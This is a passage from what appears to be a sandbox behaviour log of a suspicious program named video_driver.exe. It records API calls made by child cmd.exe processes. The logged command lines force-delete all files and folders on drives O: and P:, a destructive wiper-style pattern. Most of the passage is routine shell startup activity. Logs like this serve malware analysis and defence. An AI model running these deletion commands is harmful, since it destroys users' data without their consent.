(\"O:\") DO rmdir \"%p\" /s /q" [0068.347] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"O:\" del /f /s /q \"O:\" & FOR /D %p IN (\"O:\") DO rmdir \"%p\" /s /q" [0068.347] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.348] GetProcessHeap () returned 0x370000 [0068.348] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x210) returned 0x3820f8 [0068.348] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x382100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.348] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.348] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.348] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.348] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.348] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.348] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.348] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.348] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.348] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.348] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.348] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.348] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.348] GetProcessHeap () returned 0x370000 [0068.348] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x382bd0 | out: hHeap=0x370000) returned 1 [0068.348] GetEnvironmentStringsW () returned 0x382310* [0068.348] GetProcessHeap () returned 0x370000 [0068.348] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xae2) returned 0x384c70 [0068.349] FreeEnvironmentStringsW (penv=0x382310) returned 1 [0068.349] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.349] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.349] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.349] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.349] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.349] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.349] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.349] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.349] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.349] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.349] GetProcessHeap () returned 0x370000 [0068.349] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x54) returned 0x3817c8 [0068.349] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf9e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.349] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf9e8, lpFilePart=0x1cf9e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf9e4*="Desktop") returned 0x25 [0068.349] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.349] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf764 | out: lpFindFileData=0x1cf764*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x385760 [0068.350] FindClose (in: hFindFile=0x385760 | out: hFindFile=0x385760) returned 1 [0068.350] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf764 | out: lpFindFileData=0x1cf764*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x385760 [0068.350] FindClose (in: hFindFile=0x385760 | out: hFindFile=0x385760) returned 1 [0068.350] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.350] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf764 | out: lpFindFileData=0x1cf764*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x385760 [0068.350] FindClose (in: hFindFile=0x385760 | out: hFindFile=0x385760) returned 1 [0068.350] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.350] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.350] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.350] GetProcessHeap () returned 0x370000 [0068.350] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384c70 | out: hHeap=0x370000) returned 1 [0068.350] GetEnvironmentStringsW () returned 0x384180* [0068.350] GetProcessHeap () returned 0x370000 [0068.350] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb36) returned 0x385fa0 [0068.351] FreeEnvironmentStringsW (penv=0x384180) returned 1 [0068.351] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.351] GetProcessHeap () returned 0x370000 [0068.351] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3817c8 | out: hHeap=0x370000) returned 1 [0068.351] GetProcessHeap () returned 0x370000 [0068.351] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x400e) returned 0x386ae0 [0068.351] GetProcessHeap () returned 0x370000 [0068.351] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xa0) returned 0x382e50 [0068.351] GetProcessHeap () returned 0x370000 [0068.351] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x386ae0 | out: hHeap=0x370000) returned 1 [0068.351] GetConsoleOutputCP () returned 0x1b5 [0068.351] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.351] GetUserDefaultLCID () returned 0x409 [0068.352] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0068.352] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfb28, cchData=128 | out: lpLCData="0") returned 2 [0068.352] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfb28, cchData=128 | out: lpLCData="0") returned 2 [0068.352] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfb28, cchData=128 | out: lpLCData="1") returned 2 [0068.352] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0068.352] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0068.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0068.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0068.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0068.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0068.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0068.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0068.353] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0068.353] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0068.353] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0068.355] GetProcessHeap () returned 0x370000 [0068.355] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20c) returned 0x382ef8 [0068.355] GetConsoleTitleW (in: lpConsoleTitle=0x382ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0068.356] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.356] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0068.356] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0068.356] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0068.356] GetProcessHeap () returned 0x370000 [0068.357] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x400a) returned 0x386ae0 [0068.357] GetProcessHeap () returned 0x370000 [0068.357] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4008) returned 0x38aaf8 [0068.357] GetProcessHeap () returned 0x370000 [0068.357] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1a) returned 0x3857e0 [0068.357] GetEnvironmentVariableW (in: lpName="p IN (\"O", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.357] _wcsicmp (_String1="p IN (\"O", _String2="CD") returned 13 [0068.357] _wcsicmp (_String1="p IN (\"O", _String2="ERRORLEVEL") returned 11 [0068.357] _wcsicmp (_String1="p IN (\"O", _String2="CMDEXTVERSION") returned 13 [0068.357] _wcsicmp (_String1="p IN (\"O", _String2="CMDCMDLINE") returned 13 [0068.357] _wcsicmp (_String1="p IN (\"O", _String2="DATE") returned 12 [0068.357] _wcsicmp (_String1="p IN (\"O", _String2="TIME") returned -4 [0068.357] _wcsicmp (_String1="p IN (\"O", _String2="RANDOM") returned -2 [0068.357] _wcsicmp (_String1="p IN (\"O", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.358] GetProcessHeap () returned 0x370000 [0068.358] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3857e0 | out: hHeap=0x370000) returned 1 [0068.358] GetProcessHeap () returned 0x370000 [0068.358] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38aaf8 | out: hHeap=0x370000) returned 1 [0068.358] GetProcessHeap () returned 0x370000 [0068.358] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4008) returned 0x38aaf8 [0068.358] GetProcessHeap () returned 0x370000 [0068.358] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38aaf8 | out: hHeap=0x370000) returned 1 [0068.358] GetProcessHeap () returned 0x370000 [0068.358] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x386ae0 | out: hHeap=0x370000) returned 1 [0068.358] _wcsicmp (_String1="if", _String2=")") returned 64 [0068.358] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0068.358] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0068.358] _wcsicmp (_String1="IF", _String2="if") returned 0 [0068.358] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0068.358] GetProcessHeap () returned 0x370000 [0068.358] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x58) returned 0x383110 [0068.358] GetProcessHeap () returned 0x370000 [0068.358] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xe) returned 0x37ffc0 [0068.359] GetProcessHeap () returned 0x370000 [0068.359] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x20) returned 0x3857e0 [0068.359] GetProcessHeap () returned 0x370000 [0068.359] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3857e0, Size=0x16) returned 0x381800 [0068.360] GetProcessHeap () returned 0x370000 [0068.360] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x381800) returned 0x16 [0068.360] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0068.360] GetProcessHeap () returned 0x370000 [0068.360] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x58) returned 0x383170 [0068.360] GetProcessHeap () returned 0x370000 [0068.360] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x14) returned 0x3831d0 [0068.360] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0068.360] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0068.361] GetProcessHeap () returned 0x370000 [0068.361] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x12) returned 0x3831f0 [0068.361] GetProcessHeap () returned 0x370000 [0068.361] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1c) returned 0x3857e0 [0068.361] GetProcessHeap () returned 0x370000 [0068.361] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3857e0, Size=0x14) returned 0x383210 [0068.361] GetProcessHeap () returned 0x370000 [0068.361] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x383210) returned 0x14 [0068.361] _wcsicmp (_String1="del", _String2=")") returned 59 [0068.361] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0068.361] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0068.361] _wcsicmp (_String1="IF", _String2="del") returned 5 [0068.361] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0068.361] _wcsicmp (_String1="REM", _String2="del") returned 14 [0068.362] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0068.362] GetProcessHeap () returned 0x370000 [0068.362] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x58) returned 0x383230 [0068.362] GetProcessHeap () returned 0x370000 [0068.362] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x10) returned 0x37ffd8 [0068.362] GetProcessHeap () returned 0x370000 [0068.362] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x28) returned 0x383290 [0068.363] GetProcessHeap () returned 0x370000 [0068.363] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x58) returned 0x3832c0 [0068.363] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0068.363] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0068.363] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0068.363] GetProcessHeap () returned 0x370000 [0068.363] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x58) returned 0x383320 [0068.363] GetProcessHeap () returned 0x370000 [0068.363] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x44) returned 0x383380 [0068.363] GetProcessHeap () returned 0x370000 [0068.364] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x14) returned 0x3833d0 [0068.364] GetProcessHeap () returned 0x370000 [0068.364] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x3833d0, Size=0x12) returned 0x3833d0 [0068.364] GetProcessHeap () returned 0x370000 [0068.364] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x3833d0) returned 0x12 [0068.364] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0068.364] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0068.364] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0068.364] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0068.364] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0068.364] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0068.365] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0068.365] GetProcessHeap () returned 0x370000 [0068.365] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x12) returned 0x3833f0 [0068.365] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0068.366] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0068.366] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0068.366] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0068.366] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0068.366] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0068.366] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0068.366] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0068.366] GetProcessHeap () returned 0x370000 [0068.366] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x58) returned 0x383410 [0068.366] GetProcessHeap () returned 0x370000 [0068.366] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x14) returned 0x383470 [0068.366] GetProcessHeap () returned 0x370000 [0068.366] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x20) returned 0x3857e0 [0068.367] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0068.369] GetFullPathNameW (in: lpFileName="O:", nBufferLength=0x208, lpBuffer=0x1cf818, lpFilePart=0x1cf5c4 | out: lpBuffer="O:\\", lpFilePart=0x1cf5c4*=0x0) returned 0x3 [0068.369] wcsncmp (_String1="O:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -13 [0068.373] GetFileAttributesW (lpFileName="O:\\" (normalized: "o:")) returned 0xffffffff [0068.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.376] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.376] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.376] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.376] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.376] SetConsoleInputExeNameW () returned 0x1 [0068.376] GetConsoleOutputCP () returned 0x1b5 [0068.377] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.377] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.377] exit (_Code=0) Process: id = "60" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41d8b000" os_pid = "0x138" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"P:\" del /f /s /q \"P:\" & FOR /D %p IN (\"P:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 88 os_tid = 0x738 [0068.479] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfedc | out: lpSystemTimeAsFileTime=0x2cfedc*(dwLowDateTime=0x6a11420, dwHighDateTime=0x1d62400)) [0068.479] GetCurrentProcessId () returned 0x138 [0068.479] GetCurrentThreadId () returned 0x738 [0068.479] GetTickCount () returned 0x11488a1 [0068.479] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfed4 | out: lpPerformanceCount=0x2cfed4*=18861285297) returned 1 [0068.482] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0068.482] __set_app_type (_Type=0x1) [0068.482] __p__fmode () returned 0x770331f4 [0068.482] __p__commode () returned 0x770331fc [0068.483] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0068.483] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0068.483] GetCurrentThreadId () returned 0x738 [0068.483] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x738) returned 0x60 [0068.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.483] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0068.483] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.484] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.484] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfe6c | out: phkResult=0x2cfe6c*=0x0) returned 0x2 [0068.484] VirtualQuery (in: lpAddress=0x2cfea3, lpBuffer=0x2cfe3c, dwLength=0x1c | out: lpBuffer=0x2cfe3c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.484] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfe3c, dwLength=0x1c | out: lpBuffer=0x2cfe3c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.484] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfe3c, dwLength=0x1c | out: lpBuffer=0x2cfe3c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.484] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfe3c, dwLength=0x1c | out: lpBuffer=0x2cfe3c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.484] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfe3c, dwLength=0x1c | out: lpBuffer=0x2cfe3c*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x120000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0068.484] GetConsoleOutputCP () returned 0x1b5 [0068.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.485] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0068.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.485] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.485] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.485] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.485] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.486] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.486] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.486] GetEnvironmentStringsW () returned 0x5a20f8* [0068.486] GetProcessHeap () returned 0x590000 [0068.486] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a2bd0 [0068.486] FreeEnvironmentStringsW (penv=0x5a20f8) returned 1 [0068.486] GetProcessHeap () returned 0x590000 [0068.486] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4) returned 0x5a1898 [0068.486] GetEnvironmentStringsW () returned 0x5a20f8* [0068.486] GetProcessHeap () returned 0x590000 [0068.487] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a36a8 [0068.487] FreeEnvironmentStringsW (penv=0x5a20f8) returned 1 [0068.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceddc | out: phkResult=0x2ceddc*=0x68) returned 0x0 [0068.487] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x0, lpData=0x2cede8*=0x0, lpcbData=0x2cede0*=0x1000) returned 0x2 [0068.487] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x4, lpData=0x2cede8*=0x1, lpcbData=0x2cede0*=0x4) returned 0x0 [0068.487] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x0, lpData=0x2cede8*=0x1, lpcbData=0x2cede0*=0x1000) returned 0x2 [0068.487] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x4, lpData=0x2cede8*=0x0, lpcbData=0x2cede0*=0x4) returned 0x0 [0068.487] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x4, lpData=0x2cede8*=0x40, lpcbData=0x2cede0*=0x4) returned 0x0 [0068.487] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x4, lpData=0x2cede8*=0x40, lpcbData=0x2cede0*=0x4) returned 0x0 [0068.487] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x0, lpData=0x2cede8*=0x40, lpcbData=0x2cede0*=0x1000) returned 0x2 [0068.487] RegCloseKey (hKey=0x68) returned 0x0 [0068.487] RegOpenKeyExW 